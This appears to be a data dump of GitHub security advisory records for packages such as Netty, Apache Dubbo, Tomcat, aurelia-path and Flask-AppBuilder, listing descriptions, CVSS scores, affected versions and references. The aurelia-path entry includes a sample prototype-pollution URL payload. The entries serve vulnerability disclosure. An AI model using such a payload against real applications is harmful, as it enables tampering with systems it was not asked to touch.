https://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.68.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37136'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/41d3d61a61608f2223bb364955ab2045dd5e4020'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0012/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5316'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}] | {'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T14:36:56Z', 'nvd_published_at': '2021-10-19T15:15:00Z'} |
1.4.0 | GHSA-f3pp-32qc-36w4 | 2021-09-22T14:30:35Z | 2021-09-22T20:36:34Z | null | ['CVE-2021-23444'] | Prototype Pollution in jointjs | This affects the package jointjs before 3.4.2. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the user-provided keys used in the path parameter are arrays in the setByPath function. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}] | [{'package': {'ecosystem': 'npm', 'name': 'jointjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/clientIO/joint/pull/1514'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/commit/e5bf89efef6d5ea572d66870ffd86560de7830a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/clientIO/joint'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/releases/tag/v3.4.2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1655817'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1655816'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JOINTJS-1579578'}] | {'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-22T14:30:35Z', 'nvd_published_at': '2021-09-21T17:15:00Z'} |
1.4.0 | GHSA-cpx9-4rwv-486v | 2021-09-15T18:29:58Z | 2021-09-08T20:14:14Z | null | ['CVE-2021-36163'] | Hessian protocol configuration vulnerability in Apache Dubbo | In Apache Dubbo, users may choose to use the Hessian protocol. The Hessian protocol is implemented on top of HTTP and passes the body of a POST request directly to a HessianSkeleton: New HessianSkeleton are created without any configuration of the serialization factory and therefore without applying the dubbo properties for applying allowed or blocked type lists. In addition, the generic service is always exposed and therefore attackers do not need to figure out a valid service/method name pair. This is fixed in 2.7.13, 2.6.10.1 | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.10'}}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36163'}, {'type': 'WEB', 'url': 'https://github.com/apache/dubbo/pull/8238'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'WEB', 'url': 'https://github.com/apache/dubbo/releases/tag/dubbo-2.6.10.1'}, {'type': 'WEB', 'url': 'https://github.com/apache/dubbo/releases/tag/dubbo-2.7.13'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d0adc057bb15a37199502cc366f4b1164c9c536ce28e4defdb428c0%40%3Cdev.dubbo.apache.org%3E'}] | {'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T18:21:01Z', 'nvd_published_at': '2021-09-07T10:15:00Z'} |
1.4.0 | GHSA-9rjp-r58j-fxgq | 2021-09-02T18:03:47Z | 2021-09-02T22:05:26Z | null | ['CVE-2021-23428'] | Path traversal in elFinder.NetCore | This affects all versions of package elFinder.NetCore. The Path.Combine(...) method is used to create an absolute file path. Due to missing sanitation of the user input and a missing check of the generated path its possible to escape the Files directory via path traversal | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}] | [{'package': {'ecosystem': 'NuGet', 'name': 'elFinder.NetCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.5'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23428'}, {'type': 'PACKAGE', 'url': 'https://github.com/gordon-matt/elFinder.NetCore'}, {'type': 'WEB', 'url': 'https://github.com/gordon-matt/elFinder.NetCore/blob/633da9a4d7d5c9baefd1730ee51bf7af54889600/elFinder.NetCore/Drivers/FileSystem/FileSystemDriver.cs#L387'}, {'type': 'WEB', 'url': 'https://github.com/gordon-matt/elFinder.NetCore/blob/633da9a4d7d5c9baefd1730ee51bf7af54889600/elFinder.NetCore/Drivers/FileSystem/FileSystemDriver.cs%23L387'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-ELFINDERNETCORE-1313838'}] | {'cwe_ids': ['CWE-20', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T18:03:47Z', 'nvd_published_at': '2021-09-01T15:15:00Z'} |
1.4.0 | GHSA-4448-rc82-fcr7 | 2022-12-03T04:01:44Z | 2021-09-22T18:40:57Z | null | ['CVE-2019-5444'] | Path Traversal in serve-here.js | Versions of serve-here.js prior to 1.2.0 are vulnerable to path traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'serve-here.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5444'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/569966'}, {'type': 'PACKAGE', 'url': 'https://github.com/ChristoPy/serve-here.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1019'}] | {'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-22T18:40:39Z', 'nvd_published_at': '2019-07-10T20:15:00Z'} |
1.4.0 | GHSA-fjqg-w8g6-hhq8 | 2022-08-10T23:54:51Z | 2021-09-02T17:16:28Z | null | ['CVE-2021-25956'] | Dolibarr vulnerable to Improper Authentication and Improper Access Control | In `Dolibarr` application, v3.3.beta1_20121221 to v13.0.2 have `Modify` access for admin level users to change other user’s details but fails to validate already existing “Login” name, while renaming the user `Login`. This leads to complete account takeover of the victim user. This happens since the password gets overwritten for the victim user having a similar login name. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.beta1'}, {'fixed': '14.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 13.0.2'}}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25956'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956'}] | {'cwe_ids': ['CWE-284', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:30:25Z', 'nvd_published_at': '2021-08-17T15:15:00Z'} |
1.4.0 | GHSA-4gf2-xv97-63m2 | 2021-09-16T18:21:59Z | 2021-09-20T20:43:24Z | null | ['CVE-2020-1744'] | Exposure of Sensitive Information in keycloak | A flaw was found in keycloak before version 9.0.1. When configuring an Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle this events. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1744'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2020-1744'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1744'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}] | {'cwe_ids': ['CWE-200', 'CWE-755'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T18:21:59Z', 'nvd_published_at': '2020-03-24T14:15:00Z'} |
1.4.0 | GHSA-mwgj-7x7j-6966 | 2021-09-13T19:29:03Z | 2021-09-13T20:06:14Z | null | ['CVE-2021-24040'] | Deserialization of Untrusted Data in ParlAI | Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0. | [] | [{'package': {'ecosystem': 'PyPI', 'name': 'parlai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-24040'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/pull/3402'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/pull/3429'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/commit/4374fa2aba383db6526ab36e939eb1cf8ef99879'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebookresearch/ParlAI'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html'}] | {'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:29:03Z', 'nvd_published_at': '2021-09-10T22:15:00Z'} |
1.4.0 | GHSA-579x-cjvr-cqj9 | 2021-09-17T18:38:47Z | 2021-09-20T19:53:55Z | null | ['CVE-2021-39189'] | Observable Response Discrepancy in Lost Password Service | ### Impact
It is possible to enumerate usernames via the forgot password functionality
### Patches
Update to version `10.1.3` or apply this patch manually: https://github.com/pimcore/pimcore/pull/10223.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/10223.patch manually.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-579x-cjvr-cqj9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39189'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10223.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10223/commits/d0a4de39cf05dce6af71f8ca039132bdfcbb0dce'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/12462a99-ebf8-4e39-80b3-54a16caa3f4c/'}] | {'cwe_ids': ['CWE-203', 'CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T18:38:47Z', 'nvd_published_at': '2021-09-15T14:15:00Z'} |
1.4.0 | GHSA-m87f-9fvv-2mgg | 2021-09-13T19:10:21Z | 2021-09-13T20:05:39Z | null | ['CVE-2021-39207'] | Deserialization of Untrusted Data in parlai | ### Impact
Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks.
### Patches
The issue can be patched by upgrading to v1.1.0 or later. It can also be patched by replacing YAML deserialization with equivalent safe_load calls.
### References
- https://github.com/facebookresearch/ParlAI/commit/507d066ef432ea27d3e201da08009872a2f37725
- https://github.com/facebookresearch/ParlAI/commit/4374fa2aba383db6526ab36e939eb1cf8ef99879
- https://anon-artist.github.io/blogs/blog3.html | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'parlai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39207'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/commit/4374fa2aba383db6526ab36e939eb1cf8ef99879'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/commit/507d066ef432ea27d3e201da08009872a2f37725'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebookresearch/ParlAI'}] | {'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:10:21Z', 'nvd_published_at': '2021-09-10T23:15:00Z'} |
1.4.0 | GHSA-59g9-7gfx-c72p | 2021-10-18T14:52:03Z | 2021-09-20T20:45:44Z | null | ['CVE-2021-41079'] | Infinite loop in Tomcat due to parsing error | Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.44'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.64'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41079'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/34115fb3c83f6cd97772232316a492a4cc5729e0'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b6b674e3f168dd010e67dbe6848b866e2acf26371452fdae313b98a@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb4de81ac647043541a32881099aa6eb5a23f1b7fd116f713f8ab9dbe@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rccdef0349fdf4fb73a4e4403095446d7fe6264e0a58e2df5c6799434%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00012.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211008-0005/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4986'}] | {'cwe_ids': ['CWE-20', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T18:01:45Z', 'nvd_published_at': '2021-09-16T15:15:00Z'} |
1.4.0 | GHSA-3c9c-2p65-qvwv | 2022-05-26T19:50:24Z | 2021-09-27T20:12:16Z | null | ['CVE-2021-41097'] | Prototype pollution in aurelia-path | ### Impact
The vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf`
### Patches
The problem should be patched in version `1.1.7`. Any version earlier than this is vulnerable.
### Workarounds
A partial work around is to free the Object prototype:
```ts
Object.freeze(Object.prototype)
``` | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'aurelia-path'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.7'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41097'}, {'type': 'WEB', 'url': 'https://github.com/aurelia/path/issues/44'}, {'type': 'WEB', 'url': 'https://github.com/aurelia/path/commit/7c4e235433a4a2df9acc313fbe891758084fdec1'}, {'type': 'PACKAGE', 'url': 'https://github.com/aurelia/path'}, {'type': 'WEB', 'url': 'https://github.com/aurelia/path/releases/tag/1.1.7'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/aurelia-path'}] | {'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-27T19:18:37Z', 'nvd_published_at': '2021-09-27T18:15:00Z'} |
1.4.0 | GHSA-624f-cqvr-3qw4 | 2021-09-09T13:33:26Z | 2021-09-08T21:11:14Z | null | ['CVE-2021-32805'] | URL Redirection to Untrusted Site ('Open Redirect') in Flask-AppBuilder | ### Impact
If using Flask-AppBuilder OAuth, an attacker can share a carefully crafted URL with a trusted domain for an application built with Flask-AppBuilder, this URL can redirect a user to a malicious site. This is an open redirect vulnerability
### Patches
Install Flask-AppBuilder 3.2.2 or above
### Workarounds
Filter HTTP traffic containing `?next={next-site}` where the `next-site` domain is different from the application you are protecting
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'Flask-AppBuilder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-624f-cqvr-3qw4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32805'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/commit/6af28521589599b1dbafd6313256229ee9a4fa74'}, {'type': 'PACKAGE', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v3.3.2'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Flask-AppBuilder/'}] | {'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T21:10:56Z', 'nvd_published_at': '2021-09-08T18:15:00Z'} |
1.4.0 | GHSA-rpq8-mmwh-q9hm | 2022-02-08T21:23:38Z | 2021-09-01T18:23:58Z | null | ['CVE-2020-6950'] | Directory traversal in Eclipse Mojarra | Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.glassfish:mojarra-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.14'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6950'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/mojarra/issues/4571'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-ee4j/mojarra'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}] | {'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:21:35Z', 'nvd_published_at': '2021-06-02T16:15:00Z'} |
1.4.0 | GHSA-m7h5-fjjq-559f | 2021-10-07T13:56:41Z | 2021-09-30T17:11:11Z | null | ['CVE-2020-20120'] | SQL Injection in topthink/thinkphp | ThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the "where" and "query" methods. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'topthink/thinkphp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.3'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20120'}, {'type': 'WEB', 'url': 'https://github.com/top-think/thinkphp/issues/553'}, {'type': 'PACKAGE', 'url': 'https://github.com/top-think/thinkphp'}] | {'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-30T16:59:44Z', 'nvd_published_at': '2021-09-28T23:15:00Z'} |
1.4.0 | GHSA-mfv7-gq43-w965 | 2021-09-14T18:47:27Z | 2021-09-07T23:09:24Z | null | ['CVE-2021-25737'] | Incomplete List of Disallowed Inputs in Kubernetes | A security issue was discovered in Kubernetes where a user may be able to redirect pod traffic to private networks on a Node. Kubernetes already prevents creation of Endpoint IPs in the localhost or link-local range, but the same validation was not performed on EndpointSlice IPs. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.18.19'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.21.0'}, {'fixed': '1.21.1'}]}], 'versions': ['1.21.0']}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25737'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/102106'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/xAiN3924thY'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211004-0004/'}] | {'cwe_ids': ['CWE-184', 'CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T18:59:14Z', 'nvd_published_at': '2021-09-06T12:15:00Z'} |
1.4.0 | GHSA-vrmr-f2qh-3hhf | 2021-08-30T17:30:36Z | 2021-09-02T17:17:16Z | null | ['CVE-2021-38599'] | Improper use of cryptographic key in wal-g | WAL-G before 1.1, when a non-libsodium build (e.g., one of the official binary releases published as GitHub Releases) is used, silently ignores the libsodium encryption key and uploads cleartext backups. This is arguably a Principle of Least Surprise violation because "the user likely wanted to encrypt all file activity." | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/wal-g/wal-g'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38599'}, {'type': 'WEB', 'url': 'https://github.com/wal-g/wal-g/pull/1062'}, {'type': 'WEB', 'url': 'https://github.com/wal-g/wal-g/commit/cadf598e1c2a345915a21a44518c5a4d5401e2e3'}, {'type': 'PACKAGE', 'url': 'https://github.com/wal-g/wal-g'}, {'type': 'WEB', 'url': 'https://github.com/wal-g/wal-g/releases/tag/v1.1'}] | {'cwe_ids': ['CWE-922'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:30:36Z', 'nvd_published_at': '2021-08-12T16:15:00Z'} |
